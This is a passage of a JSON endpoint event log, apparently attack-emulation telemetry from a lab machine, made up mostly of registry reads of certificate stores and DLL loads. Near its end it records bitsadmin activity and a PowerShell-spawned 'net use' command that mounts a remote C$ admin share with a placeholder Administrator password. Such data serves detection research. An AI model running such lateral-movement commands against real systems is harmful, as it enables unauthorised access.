"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570904490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ncryptsslp.dll", - "image_path": "C:\\Windows\\System32\\ncryptsslp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570904180000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\System32\\mpr.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570905270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dpapi.dll", - "image_path": "C:\\Windows\\System32\\dpapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570905119984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "file", - "file_name": "BIT6BFA.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570905580000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570905580000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570906360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "process", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "subtype": "terminate", - "timestamp": 131883570906360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "process", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "file", - "file_name": "BITSADMIN.EXE-80E1BDAA.pf", - "file_path": "C:\\Windows\\Prefetch\\BITSADMIN.EXE-80E1BDAA.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4924, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570906590000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "event_type": "process", - "pid": 4924, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570906520000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001066F84D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c \" net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2260, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570909009984, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "command_line": "cmd.exe /c net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7556, - "ppid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570909130000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", - "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001085164E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570909020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7556, 